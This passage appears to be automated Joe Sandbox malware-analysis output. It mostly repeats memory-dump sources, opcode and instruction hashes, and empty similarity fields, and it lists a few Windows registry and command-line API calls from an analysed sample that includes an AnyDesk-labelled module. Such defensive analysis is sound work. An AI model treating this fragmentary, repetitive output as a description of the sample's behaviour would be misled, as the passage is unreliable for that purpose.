                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_65a0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1828848519.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_65a0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1828848519.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_65a0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1828848519.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_65a0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1828848519.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_65a0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 7f711dde86c12822916df79725f805f151b296af7c3f5cbcec3755a846bb0dff
                                                                                                                                                                                                                                                  • Instruction ID: e6c4912fac16353517b0f46f353d48effceadea9efa2c9967693d60c7c8f235f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f711dde86c12822916df79725f805f151b296af7c3f5cbcec3755a846bb0dff
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62F10434B402188FDB44DF68C994EADBBB6BF89704F11809AE506DB3A6DA71ED41CF50
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1828848519.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_65a0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 2af8f3c73d02081892a70f2ba3224bf3b21a6add5b2932df2bd9281725d103ba
                                                                                                                                                                                                                                                  • Instruction ID: f384b7629ec5516dc6f66ab67a158c2e4fc974a886fa80c4d01151de886ac94f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2af8f3c73d02081892a70f2ba3224bf3b21a6add5b2932df2bd9281725d103ba
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CAD16970B50108AFD784EF98C985E9DB7B6FF88300F508069F606AB765CB71ED459B60
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1828848519.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_65a0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: e2dad52e2e41646b82803f3ac834c058fca2650edf148f50646788be6690aae8
                                                                                                                                                                                                                                                  • Instruction ID: 31b2cd912e499c07a99fa2f248b8c1f7cc64bfe82fd67e64ef30feb4778a4ff7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e2dad52e2e41646b82803f3ac834c058fca2650edf148f50646788be6690aae8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 52D16E30B513049FEB409F68C858B6E7BB6FF89704F148059EA029B3A1CBB5DD45DBA1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1828848519.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_65a0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 7b7a913e012ef15b007e26946e8789bd29f2036101ee2a1bf631eeca4b5da047
                                                                                                                                                                                                                                                  • Instruction ID: 33e2819d30f96827955b551a3bd1105135cead2d9387f81953deabbf0c1b5e3b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b7a913e012ef15b007e26946e8789bd29f2036101ee2a1bf631eeca4b5da047
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0CD18030B503049FEB409F68C894B6E7BA6FF89708F508459EA029B3E1CBB5DD45DB91
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1828848519.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_65a0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 9fbd4a16db3c79775835833f61a9df980f6ccfcb8fb8a6bff7479c2eb5b9c4d1
                                                                                                                                                                                                                                                  • Instruction ID: e03133233b53b57d739db0e3c607fd5bfefc760dbd366d30f587240f533f62c6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9fbd4a16db3c79775835833f61a9df980f6ccfcb8fb8a6bff7479c2eb5b9c4d1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F3214835B40104AFCB54CF69D984EAABBB2FF88714F1184A9ED059B365DA31EC46CB11
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1803527071.00000000015FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015FD000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_15fd000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 2b96403d59df6dfcce382f6e7cbebb16d5329400b738d91b039c10442d625eb5
                                                                                                                                                                                                                                                  • Instruction ID: ad17347d489a5258356759f8462b5b0d567ce6c6c324ac226b7509df05f9c45f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2b96403d59df6dfcce382f6e7cbebb16d5329400b738d91b039c10442d625eb5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6821E272500240DFCB059F94D9C0B2ABFB5FB88314F24C66DEA094E256C33AD416CBA1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1803527071.00000000015FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015FD000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_15fd000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: b7866e2c3fd84f5b25e1017588505f512746866edfd88370302b733614e8952a
                                                                                                                                                                                                                                                  • Instruction ID: 9c20833efb79a3ae4f67dcdd78c723d3f9cee2a8698d64a1fab6ed12178943d9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b7866e2c3fd84f5b25e1017588505f512746866edfd88370302b733614e8952a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B72100B1500240DFDB05DF98D9C8B2ABFB5FB88318F20C56DEA090F256C336D456CAA2
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1803742474.000000000160D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0160D000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_160d000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 14dad1a8db1540d4771d7d6d0c088fcf3ce4e116770e37df0463c297e9e65d82
                                                                                                                                                                                                                                                  • Instruction ID: 0a16a1a4de45bf73214af977c28473af819d825d58e3f2a8e5ca0779ddab8180
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 14dad1a8db1540d4771d7d6d0c088fcf3ce4e116770e37df0463c297e9e65d82
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A621F271604200DFDB1ADF98D984B27BFA5EB84354F20C66DD94E4B396C33AD447CA61
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1828848519.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_65a0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1803742474.000000000160D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0160D000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_160d000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1803527071.00000000015FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015FD000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_15fd000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1803527071.00000000015FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015FD000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_15fd000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1803527071.00000000015FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015FD000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_15fd000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1803527071.00000000015FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015FD000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_15fd000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1828724071.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_6540000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: $^q$$^q
                                                                                                                                                                                                                                                  • API String ID: 0-355816377
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1828724071.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_6540000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:0.4%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                  Signature Coverage:1.6%
                                                                                                                                                                                                                                                  Total number of Nodes:129
                                                                                                                                                                                                                                                  Total number of Limit Nodes:5

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RegCreateKeyExW.KERNEL32(80000002,Software\Google\GCAPITemp,00000000,00000000,00000000,0002021F,00000000,?,?,?,00000000,00000000), ref: 69C5F7CB
                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,00000000,00000000), ref: 69C5F7D9
                                                                                                                                                                                                                                                  • RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000000,?,00000000,00000000), ref: 69C5F7EB
                                                                                                                                                                                                                                                  • RegDeleteValueW.KERNEL32(?,?,?,00000000,00000000), ref: 69C5F7FE
                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000,00000000), ref: 69C5F807
                                                                                                                                                                                                                                                  • RegDeleteKeyW.ADVAPI32(80000002,Software\Google\GCAPITemp), ref: 69C5F815
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: DeleteValue$CloseCreatelstrlen
                                                                                                                                                                                                                                                  • String ID: Software\Google\GCAPITemp$test
                                                                                                                                                                                                                                                  • API String ID: 495649648-3707622476
                                                                                                                                                                                                                                                  • Opcode ID: f76cd66e646c4becc2719c9c11448770395680c246b1b435d680d2454d2b2ce2
                                                                                                                                                                                                                                                  • Instruction ID: 590ea218f49974408e9f82fca02006f61ce515897b4db7851b0c5f82da9b2fa5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f76cd66e646c4becc2719c9c11448770395680c246b1b435d680d2454d2b2ce2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B4115E7190022DAFDB00DF95DD89DFFBB7DFB46751B900429F506A6100E6315E058BB1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: dllmain_crt_dispatchdllmain_raw
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1382799047-0
                                                                                                                                                                                                                                                  • Opcode ID: c38b8f6560b2fb78b16d2c313a63c7083990a9a8c2fed2a9b666370fb4fd0ae7
                                                                                                                                                                                                                                                  • Instruction ID: 330b803584c1303aaa6ae76a7ddd8e1c0a6503fdec4b37b47ab387ac5be77932
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c38b8f6560b2fb78b16d2c313a63c7083990a9a8c2fed2a9b666370fb4fd0ae7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B721D576F80765ABDB21DE64AD40D6F3A39BFA5F58B015908FC142B141E334C8108BA0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • new.LIBCMT ref: 69C28AC0
                                                                                                                                                                                                                                                  • GetCommandLineW.KERNEL32(00000000,?,?,?,?,?,69C3EF5E,00000000,00000000,00000000), ref: 69C28AD6
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CommandLine
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3253501508-0
                                                                                                                                                                                                                                                  • Opcode ID: 507593138f47d143efdfa5432b9fa5cb50c22903db5ee83b8fbb9923ac6d2962
                                                                                                                                                                                                                                                  • Instruction ID: ba0dc57638f680b792357596d399ad8820882904a79291fdc25c4c38994ba8b0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 507593138f47d143efdfa5432b9fa5cb50c22903db5ee83b8fbb9923ac6d2962
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D018475654200DFCB04EF70E855A6BB7A5FB95604F00961DE86A4B290FF309906DBD3
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RegOpenKeyExW.KERNEL32(00020219,?,00000000,?,?), ref: 69C340FD
                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 69C34110
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseOpen
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 47109696-0
                                                                                                                                                                                                                                                  • Opcode ID: fa61e901229770cadcf1355d9fb415d2e997cb5d6f2335321ed3ddb06bc5082e
                                                                                                                                                                                                                                                  • Instruction ID: b606b0fdd7c483e3ceb0429f490ca98e9314dc104dd11a7a6cb075b3489afdae
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa61e901229770cadcf1355d9fb415d2e997cb5d6f2335321ed3ddb06bc5082e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9F08C71205305AFD7208F0AC845B1BFBF8FB98321F40852EF9A9C3240E771E8048BA1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • new.LIBCMT ref: 69C3EF37
                                                                                                                                                                                                                                                    • Part of subcall function 69C27AB0: new.LIBCMT ref: 69C27AF2
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 9495f990225b6cf4c86bf3b81041fb7117de8de753ad40680a4f476e959353e5
                                                                                                                                                                                                                                                  • Instruction ID: a7fadeb3f30d2708bedacaaeed778f08949121311d7ee57c98cc426f6487a9fe
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9495f990225b6cf4c86bf3b81041fb7117de8de753ad40680a4f476e959353e5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD01A2369152349BDB14EB65B815BAE3778BF05768F40D51AD8206B180FF749901CBE2
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  control_flow_graph 92 69c34140-69c3415c RegQueryValueExW
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RegQueryValueExW.KERNEL32(80000002,00020219,00000000,00000000,00000000,00000000,?,69C5F4D8,69C763E8,?,Software\Google\Update\Clients\{8A69D345-D564-463c-AFF1-A69D9E530F96},00020219,7FFFFFFF,80000002), ref: 69C34150
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: QueryValue
                                                                                                                                                                                                                                                  • String ID:
